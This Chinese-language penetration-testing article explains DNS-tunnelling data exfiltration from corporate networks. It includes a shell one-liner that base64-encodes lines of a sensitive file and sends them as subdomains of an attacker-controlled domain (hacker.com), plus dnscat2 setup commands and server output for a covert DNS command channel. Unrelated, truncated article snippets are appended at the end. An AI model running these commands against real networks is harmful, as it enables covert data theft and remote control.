面向企业网络的数据暗渡攻防大战

面向企业网络的数据暗渡攻防大战。数据暗渡,也称为数据挤出,指的是在未经授权的情况下从计算机中转移数据。对于公司网络来说,这些类型的攻击可以通过手动方式来完成,比如利用U盘;此外这种攻击也可以通过自动的方式来进行,这时候就需要借助于网络传输数据。在本文中,我们将重点介绍在渗透测试期间基于网络的数据暗渡技术,以及相应的安全加固措施。

隧道技术

作为攻击方,我们假设自己没有有效的域凭据。这意味着我们不能使用公司的代理向外传输数据。同时,如果我们没有连接到互联网,也无法泄露敏感信息。因此,在这种情况下,隧道技术就能发挥非常重要的作用。

隧道技术不是通过网络直接发送数据包,而是通过封装技术在另一个(通常是加密的)连接中发送数据。由于实际数据通过不同的协议进行网络传输的,因此就有机会到达互联网。

根据使用的协议类型,隧道名称可能会有所不同,在本文中,我们将介绍最常见的一些类型。

DNS隧道

在介绍DNS隧道之前,我们首先介绍一些非常简单,但很重要的知识。

➜ ~ cat /etc/resolv.conf|grep -v '#'

domain acme.local

nameserver 192.168.1.1

nameserver 192.168.1.2

首先,我们必须识别出内部的DNS服务器。这很容易,下面将进行一些测试。我们需要回答以下问题。

我们能否与内部DNS通信?

我们能否通过公司DNS解析内部域?

我们可以通过内部DNS解析外部域(例如:pentest.club)吗?

我们可以直接与外部DNS通信吗?

➜ ~ nslookup acmebank.local

Server: 192.168.1.1

Address: 192.168.1.1#53

Name: acmebank.local

Address: 192.168.10.12

➜ ~ nslookup google.com

Server: 192.168.1.1

Address: 192.168.1.1#53

Non-authoritative answer:

Name: google.com

Address: 216.58.209.14

➜ ~ nslookup pentest.blog 8.8.8.8

Server: 8.8.8.8

Address: 8.8.8.8#53

Non-authoritative answer:

Name: pentest.blog

Address: 104.27.169.40

Name: pentest.blog

Address: 104.27.168.40

第一个命令的结果表明,我们可以解析内部域;第二个命令的结果表明,我们可以通过公司DNS服务器解析外部域。这意味着我们可以实现DNS隧道,但我想提醒大家注意第3个命令。大多数安全的网络是不允许与外部DNS进行通信的。如果网络允许这样做的话,这就是另外一个安全问题了,作为渗透测试人员,你必须单独指出这个问题!

DNS隧道是如何工作的?

本文不仅提供了非常详细的示意图,同时,我们还会针对每个步骤进行详细的解说。

1. 假设渗透测试人员掌控了一个域,例如hacker.com,对它具有完全的控制权。渗透测试人员向内部DNS服务器发送DNS请求,以解析hacker.com

2. hacker.com的权威DNS服务器位于互联网的其他地方。因此,它通过防火墙将相应的请求重定向到根服务器。

3. 经过多次重定向,DNS请求终于到达渗透测试人员掌控的域名hacker.com的权威DNS服务器。

4. 由于这个请求是由渗透测试人员生成的,因此响应是什么并不重要。

5. 该响应到达内部DNS服务器

6. 最后,渗透测试人员将会收到该响应。

这个过程,实际上可以用来跟公司网络外部的服务器进行通信。到目前为止,我们只是找到了一种与外部服务器通信方式。但是,下面开始介绍如何进行数据渗透。同时,我们假设获得了如下所示的一些敏感数据。

➜ ~ cat sensitive.txt

Alice

Bob

John

同时,我们想通过网络把这些机密泄露出去,尽管这些网络的设置是相对安全的。

1

for i in $(cat sensitive.txt); do d=$(echo $i|base64) && nslookup $d.hacker.com; done

上面的shell命令将逐行读取包含敏感信息的文件。然后,对每行内容进行base64编码。然后,在DNS查询期间将其用作子域。这样,一旦查询到达hacker.com的权威DNS服务器,我们就可以捕获相应的DNS日志,通过解析日志可以获得子域,从而得到相应的敏感数据。这种技术非常有用,但它有以下限制。

这是一种单向通信。我们不能从C2(权威DNS)发回命令

虽然读取文件非常容易,但是如果需要处理100MB数据时,将会发生什么情况? DNS数据包可能会以不同的顺序到达。

因此,我们需要一个解决所有问题的工具。幸运的是,我们借助于dnscat2。

如何配置和使用Dnscat2?

Dnscat2提供了客户端和服务器应用程序。下面是构建一个DNS2服务器所需的命令。

~ git clone https://github.com/iagox86/dnscat2.git

~ cd dnscat2/server/

~ gem install bundler

~ bundle install

下面是在公司网络上面安装客户端程序所需的具体命令。

root@pentest:~# git clone https://github.com/iagox86/dnscat2.git

root@pentest:~# cd dnscat2/client/

root@pentest:dnscat2/client/# make

一切准备就绪之后,现在我们就可以启动Dnscat2服务器了,具体命令如下所示。

root@khaleesi:/opt/dnscat2/server# ruby dnscat2.rb opendns.online

New window created: 0

dnscat2> New window created: crypto-debug

Welcome to dnscat2! Some documentation may be out of date.

auto_attach => false

history_size (for new windows) => 1000

Security policy changed: All connections must be encrypted

New window created: dns1

Starting Dnscat2 DNS server on 0.0.0.0:53

[domains = opendns.online]...

Assuming you have an authoritative DNS server, you can run

the client anywhere with the following (--secret is optional):

./dnscat --secret=7040f6248e601519a9ebfb761e2402e3 opendns.online

To talk directly to the server without a domain name, run:

./dnscat --dns server=x.x.x.x,port=53 --secret=7040f6248e601519a9ebfb761e2402e3

Of course, you have to figure out yourself! Clients

will connect directly on UDP port 53.

opendns.online是处于渗透测试人员控制之下的一个域名。此外,重要的一点是让权威DNS服务器为opendns.online生成一个密钥。这个密钥将以“共享秘密”的方式,用于对隧道期间的通信进行加密。除此之外,dnscat还提供了两种不同的客户端命令。即使你能够向外部服务器发送DNS查询,也不要忘记大多数安全网络是不允许任何人使用外部DNS服务的。

时间: 2024-10-06 19:27:27

面向企业网络的数据暗渡攻防大战的相关文章

网络安全问题打七寸,BlackBerry以安全软件面向企业话安全

计算机网络中的安全问题已经延伸到了网络最外围,终端网络的安全问题日益严峻,业界正在考虑如何通过终端设备防护网络安全.但Gartner预计, 到2020年,全球使用的联网设备数量将达到208亿,IoT设备生成的数据将会达到1.6泽字节,甚至超出预计的数据中心总流量,安全防护从这里入手的难度可想而知.以智能手机业务家喻户晓的BlackBerry认为,未来70%的安全价值将由医疗保健.物流运输.能源等B2B等行业驱动,如何做好安全防护这件事,BlackBerry有话说. "安全在我们开展手机业务的时候

调查显示大数据与云计算令企业网络不堪重负

中介交易 SEO诊断 淘宝客 云主机 技术大厅 腾讯科技讯(小贝)北京时间10月16日消息,据国外媒体报道,如今,企业网络承受的压力越来越大.企业想要增加新的服务,支持新的设备.这就需要运行更多的数据,连接更多的员工.另外,企业网络还要运行良好,无论在何种情况下.现在,全世界约有50亿部连网设备,数十亿用户都希望自己所加入的网络能够运行良好. 为了弄清楚企业网络是否已经达到某种节点,美国网络通讯设备公司Juniper与市场调研公司Forrester共同对150位企业高级IT主管进行了调查,以此来

一组数据看2024年的企业网络市场规模

根据海外调研机构Reportbuyer的数据显示,到2024年,全球企业网络市场预计将达到646.3亿美元.其中,企业采用虚拟化技术将减少传统基础设施架构建设的投入. 亚太市场预计将保持最大的市场增长 另外,互联网服务的强劲需求预计将推动网络设备的收入增长.比如100G以太网交换机. 此外,自带设备(BYOD)的增长和使用移动设备的员工预计将增加行业份额的增长.BYOD趋势带动了针对任何移动设备而产生大量的无线网络和关键任务迁移应用程序的增长. 越来越多的IT基础设施的增加,将集中在高速发展的大

企业中的数据工具

数据 企业数据应用工具的选择 一.  为什么要选择工具 企业与机关.院校有于最大的不同就是内部人员的素质层次不一,而因很多原因不能要求所有的人都可以有很高的水平.记着我所接触的一个还算是十分新的企业里,在企业里会格盘就算是计算机高手了.这也从一个方面表现出了企业应用的滞后性. 正是在这种环境里,为了叫我们一线人员能够不改变其原有工作习惯的条件下完成工作.我们也进一步去体会办公自动化产品本身的高度集成与开放性.而这一切的基础都源于ODBC,下面将仔细说明这一切. 二.可爱的ODBC.缓慢的ODBC

企业网络重在管理 网络管理软件解读

网络技术飞速发展,网络的规模不断扩大,让越来越多的公司和组织机构逐渐开始体验到了一种"成长的烦恼".四通八达的网络成为企业内外沟通的根本所在,在网络规模不断扩张和网络技术与设备不断升级过程中,经常会面临流量增幅远远领先于预算增幅以及需要部署不同类型网络技术,甚至是互不兼容技术的挑战.在日常运行过程中,也时常会遭遇网络性能莫名其妙下降等问题的困扰.如何管理好企业网络复杂和繁琐的日常工作,就成了企业管理人员关注的焦点.借助网络管理软件,无疑成为提高工作效率,解决工作协调性的必经之路. 随网

面向企业的云计算,第1部分:了解云的一些基本概念

引言 什么是云计算? 这个问题看起来似乎是老生常谈并且很简单,但事实上却不是这样.目前,网上有数百(甚至数千) 种云计算定义.要全面回答此问题,在尝试定义之前先了解什么不是云计算也许是更便捷的方法. 有些人说云计算只不过是一直在Web 2.0 运动前沿的软件作为服务 (SaaS) 模型的另一种称谓.还 有一些人说,云计算是一种市场宣传,只不过是老技术(如效用计算.虚拟化或网格计算)换了张新面 孔.此观点忽略了这样一个事实,即云计算比这些特定技术中的任何一个的范围都要广.为了确保做到 这一点,云解

企业网络安全管理维护之探析

  今很多企业都建设了企业网并通过各种渠道接入了Internet,企业的运作越来越融人计算机网络,但随之产生的网络安全问题也日渐明显地摆在了网络管理员面前. 对于网络管理者来说,网络的安全管理直接关系到企业工作的稳定和正常开展.而企业对安全性的要求有其自身的特殊性,除了传统意义上的信息安全以外,还应提高对病毒.恶意攻击以及物理设备的安全防范. 本文根据本人在企业任职多年网络管理员的实际,侧重谈了下如何加强对企业网络的安全管理.主要分别从企业内部网络安全管理与病毒防范.企业服务器的安全.基于VLA

《CCNP SWITCH (642-813 )学习指南》一1.1 复杂的企业网络框架、架构和模型

1.1 复杂的企业网络框架.架构和模型 CCNP ROUTE (642-902)学习指南 本节介绍融合网络(converged network)及其中的各种数据流.为满足这种网络的需求,Cisco制定了智能信息网(Intelligent Information Network,IIN)策略,并开发了面向服务的网络架构(Service-Oriented Network Architecture,SONA)以引导企业网转向IIN.本节将介绍这两个主题. 本节还将概述Cisco企业级架构,并介绍传统的

阿里云面向企业效率的云上产品全解析——云AP

可靠与划算并重,稳定与智慧的化身 2017年10月12日的杭州云栖大会上,阿里云副总裁李津做了"云之深处"的阿里云新品发布主题演讲,在演讲中,李津认为在数字化时代,商业的效率将指数级提升,而智能技术的发展,也将给企业与客户的交互带来巨大的变化,为了帮助企业在数据化时代领跑商业前沿,阿里云推出了面向企业效率的云上产品栈,云AP,就是其中的一个重要产品. 阿里AP是基于云和大数据平台整合的新一代具有颠覆性意义的无线网络体系产品,产品面涵盖了企业级 Wi-Fi 管理.大数据服务等内容,是第三